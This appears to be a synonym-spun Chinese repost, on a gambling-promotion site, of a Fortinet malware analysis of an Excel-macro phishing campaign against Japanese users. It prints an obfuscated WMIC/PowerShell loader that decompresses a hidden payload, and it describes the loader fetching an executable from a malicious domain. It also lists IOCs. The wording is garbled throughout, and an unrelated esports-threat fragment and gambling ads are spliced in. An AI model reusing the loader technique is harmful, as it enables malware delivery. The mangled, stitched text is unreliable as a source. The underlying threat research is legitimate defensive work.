隐蔽的Excel变量是怎样被用于歹意邮件进击的? | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

隐蔽的Excel变量是怎样被用于歹意邮件进击的?

申博_行业观察 申博 28次浏览 未收录 0个评论

sunbet

sunbet为您提供电影、电视、音乐、明星八卦、娱乐新闻等全方位娱乐新闻,最全面丰富的娱乐圈新闻。

,

在过去的几个月里,FortiGuard SE团队一直在应用和加强Fortinet机械进修体系来检测新涌现的要挟。近来,个中一台机械检测到一个异常的峰值,恰是依据这个效果,我们发明了一个歹意软件活动,该活动在过去一段时候曾特地针对日本用户。

与大多数垂纶活动一样,这类进击从一封试图诳骗收件人翻开附件的电子邮件最先,在本文的示例中,附件是一个歹意的Excel文档,个中包含歹意宏。然则,在此次观察中,我们发明了这些进击者运用的反剖析手艺,以及一个Excel变量(现在没有文档纪录)。

进击活动剖析

该进击由发送给收件人的垃圾邮件构成,个中邮件的上下文包含雷同邮件主题的多种变体,其内容是关于发票的。

一些音讯中包含或人的声明,宣称他们“异常感激”收件人,而且发件人请求对附件举行复兴:

另一个变体包含来自名为“MOTH”的人的四则音讯,这些音讯以下:

隐蔽的Excel变量是怎样被用于歹意邮件进击的?

来自“MOTH”的音讯变体

其他音讯,比方永久谢谢收件人,以及在须要时供应以.pdf文件情势供应发票的信息。

邮件附件是包含歹意宏的Microsoft Excel文件,的示例以下所示:

除了针对特定国度/区域以外,此次进击引发我们注重的是Excel宏自身运用的手艺。虽然这些进击并不都是新涌现的,但开辟者显然在开辟此进击时异常警惕。

运用的第一个技能是典范的伪图片,如上图所示。假装的图片背地,电子表格的单元格A1现实上包含一个冗杂的歹意字符串。尝试复制此字符串时,较早版本的Excel将没法处置惩罚它。

进入宏自身,我们尝试了经常使用的剖析要领。为了疾速相识我们正在处置惩罚的内容,我们寻觅到了终究的有用载荷,并试图简朴地建立一个通例的MsgBox来检察终究的输出。然则,此操纵失利,以下面的例子所示:

为了便于剖析,我们尝试了将输出写入电子表格中的另一个单元格的要领。一样,使人惊奇的是,我们得到了一个相似的“内存不足”毛病。

风趣的是,当我们试图将输出写入外部文件时,也涌现了一样的题目。

事实证明,作者现实上找到了一种将反剖析手艺整合到文件中的要领,以防备剖析职员运用他们一般运用的疾速而简朴的要领来消弭宏的殽杂。为了弄清现实发生了什么,我们须要对宏举行更细致的搜检。

与险些一切歹意宏一样,一旦翻开电子表格,这个宏将经由过程挪用Workbook_Open()自动启动。然则,现实上没有太多的宏搜检Excel特定的变量,比方xlXmlExportValidationFailed。如许,开辟者确保了宏只能在Office Excel环境中实行,这意味着假如宏仿真器不能准确地仿真特定的Excel变量,它们可能会失利。

在宏的全部实行过程当中,在差别的位置运用雷同的技能。

别的,此宏还运用Application.International Excel属性,该属性包含有关当前国度/区域的信息以及其对Beta1()函数的挪用中的国际设置。这终究会援用Excel中的xlDate变量,奇怪的是,该变量现在没有文档纪录。

隐蔽的Excel变量是怎样被用于歹意邮件进击的?

Excel中的Application.International文档缺乏xlDate的示例

此变量很主要,至于详细缘由,我下面再讲。

隐蔽的Excel变量是怎样被用于歹意邮件进击的?

电子竞技行业所面临的四大攻击威胁

当今社会,电子竞技已经从小众娱乐发展成为一个高利润的产业,源源不断的广告收入和赞助使得竞技比赛无论在数量上还是奖金额度上都呈现快速增长的趋势,除了吸引越来越多的人关注和参与外,其丰厚的利润也理所当然地吸引来了网络罪犯。 针对电子竞技行业的攻击类型主要包括分布式拒绝服务(DDoS)、勒索软件攻击、零日攻击、数据泄露和针对性恶意软件攻击。我们预测在未来几年内,会有以下四类威胁场景崛起: 黑客硬件 职业比赛通常允许选手自带鼠标键盘之类的硬件,而有些选手就借此在硬件中

反仿真剖析的技能

如上面的oceran()所示,其他Excel变量用作反仿真器技能。别的,Shell()敕令须要两个参数:第一个是现实敕令,第二个是窗口款式。此处的窗口款式定义为Sgn(123.67) – 1,这是一种这是示意0的一种奇异体式格局。因而,不管实行什么敕令,该窗口都将被隐蔽。现实敕令由对Welcome()和westand()函数的组合挪用定义。 WestAndS()函数用于对单元格A1中的上述冗杂字符串举行隐约处置惩罚,而Welcome()函数则运用Beta1密钥对其举行相识密。提示一下,Beta1项是经由过程运用未纪录的xlDate变量经由过程Application.International属性接见国际设置来肯定的。默许情况下,xlDate的USA值为2。然则,这个值致使了杂沓,因为这个密钥不能准确地解密A1字符串。

因为我们的剖析窗口很小,因而我们决议,疾速的暴力进击可能会更有用力,而不是无休止地尝试找出xlDate的现实寄义。一个步长为“3”的疾速FOR轮回(因为剧本须要一个“Beta1 * 3”的项)被添加到宏中,试图强制实行准确的有用载荷。末了,我们的战略胜利了:

PowerShell的剖析

该解密行的Beta1值与81符合,这关于规范的日语体系来讲显然是准确的。解密后的有用载荷以下:

Wmic ProcEss   "caLL"  CrEATe   "pOwERsHeLL -NONiNteRaCTI -W 1 -ExecutiOnpoL  BypAsS -NoProF  &( $pSHOmE[21]+$PShOME[30]+'x')( "\"sal b sal;b c Iex;b v nEw-oBject;(v Io.coMPReSSIoN.dEFlAtEStrEAM([sYsteM.Io.mEmORystrEAm] [conVErT]::fRoMBasE64StRiNg('REDACTED BASE64STRING')"\"+  ([CHAR]44).TOStRInG()  + "\"[io.cOMpReSsIOn.COmPreSSiONmOdE]::DEComPrESs )|%{v iO.StREAmReADEr( `$_"\"+  ([CHAR]44).TOStRInG()  + "\"[tExT.encODinG]::ASciI)}|%{ `$_.READtOeND( )})|c"\" ) "

注重PowerShell对参数的自在运用,没必要指定一个完全的参数,比方“ -ExecutionPolicy”或“ -NonInteractive”。只要能明白指定的参数,即使是部份婚配也可以接收。比方,零丁指定“-e”是不明确的,因为它既可以援用“-ExecutionPolicy”,也可以援用“-EncodedCommand”,因而会发生毛病。这类手艺多是一种躲避战略,以防止仅依赖于在敕令行字符串中查找特定形式的检测引擎。

至于PowerShell的隐约处置惩罚,现实上在一个敕令中嵌入了五层种种隐约处置惩罚手艺。末了一层将留给读者作为演习。然则,一旦到了那边,它应当看起来像下面如许:

在此实行另一个日语体系搜检。在许可剧本继承实行之前,它将搜检操纵体系架构是不是为ビ。ビ是片假名的字符,而且是日语的构成部份,许可转录日语中借来的或外来的单词。

该剧本大批运用了PowerShell别号和字符串衔接技能,更风趣的是,它还运用异通例变量名,迥殊是以数字开首的称号,这在PowerShell中是许可的。

末了一层的作用是运用DownloadFile敕令联络hxxps://berdiset.top/uploads/QuotaManager(位于俄罗斯),然后将响应的PE文件保存到$ENv:apPdAta\Outlook.srss.exe。因为时候限定,我们没有时候完成对下载文件(Outlook.srss.exe)的剖析,该文件多是BEBLOH/URSNIF变体(银行木马)。

在荷兰的散布和风趣的进击活动

对邮件题目的观察显现,在此次活动中运用了以下IP地点:

93.147.115.90
93.58.112.48
79.11.236.101
79.11.173.200
165.51.245.201
130.0.161.134
39.45.30.114
79.7.176.43
31.197.238.214
79.3.19.107

令我们受惊的是,多达80%的IP地点都位于一个国度——意大利。

别的两个IP地点离别来自巴基斯坦(39.45.30.114)和突尼斯(165.51.245.201),深入研究后,我们可以肯定在其他活动中也看到了这些IP地点,迥殊是在僵尸收集示例下,考虑到流传局限和变化以及前面示例中看到的音讯,这是有意义的。在我们的观察过程当中,我们发明这些IP地点之前与Avalanche,Conficker,Cutwail和Quant僵尸收集以及Smokeloader和Nivdort歹意软件变体相干联。

这些计算机很多是属于室庐用户或小型企业的计算机,它们还不晓得本身受到了进击。

荷兰和意大利的异常活动

依据我们的观察,我们发明这些进击大部份集合在日本,和欧洲某些。然则,我们还注重到一个显著的破例,来自意大利IP地点130.0.161.134的活动,个中大批活动针对荷兰。

只管日本是BEBLOH / URSNIF的进击目的,但我们不肯定为什么荷兰会在此特定活动中首屈一指,但观察到的数据还显现,样本:[cb0b8a2c1ca33d89a2181e58a0948bd88f478a39af45d0b54c53913cd89a5aba]一直在荷兰。

隐蔽的Excel变量是怎样被用于歹意邮件进击的?

敕令与掌握

如前所述,观察到样本07c7ec61d9e4fe3af22a80fa206a019ed490aa37a1c1f6c46c3563701adc0510举行了以下挪用:

hxxps://berdiset.top/uploads/QuotaManager

它剖析为我们的数据集观察到的以下IP地点: [5.188.60.133]和[5.8.88.24] ,两者都托管在俄罗斯,而且运用中国动态DNS供应商DNSPOD.com。风趣的是,在种种报告中都观察到URSNIF木马防止了运转启用了俄语或中文的操纵体系的一切计算机。然则,我们不完全肯定为什么近来的活动背地的参与者为什么运用DNSPOD而不是动态DNS托管。

然则,风趣的是,该域名在2019年5月12日注册。我们的观察表明,触及berdiset.top的样本在日本异常活泼。

5.8.88.24的进击活动

风趣的是,我们之前也观察到5.8.88.24的活动,大部份进击集合在秘鲁。我们可以从下面的图表中看到,没有任何活动,然后在2019年终倏忽激增。我们不晓得此次活动的细节,也没有更多的细节,但注重到相干IP地点的趋向是很风趣的。

减缓步伐

FortiMail或其他邮件解决方案可用于阻挠特定文件范例,FortiMail也可以设置为在内部或在云中将附件发送到FortiSandbox解决方案(ATP),以肯定文件是不是显现歹意行动。启用了防病毒功用的FortiGate防火墙以及有用的定阅将被设置为检测并阻挠此要挟。

FortiMail也可以设置为“内容设防和重修”,以删除进入的Excel文件,Office文档和PDF文件中的剧本的一切宏,以便在进入收集之前将这些线程阻挠。

运转最新病毒署名的FortiClient将检测并阻挠该文件及相干文件,当前检测到此进击中的文件为:

VBA/Agent.MUV!tr.dldr

W32/Inject.ALRRV!tr

IOC

此报告中的一切收集IOC已被FortiGuard Web过滤效劳列入黑名单

本文翻译自:https://www.fortinet.com/blog/threat-research/excel-variable-targeting-japanese-users.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明隐蔽的Excel变量是怎样被用于歹意邮件进击的?
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址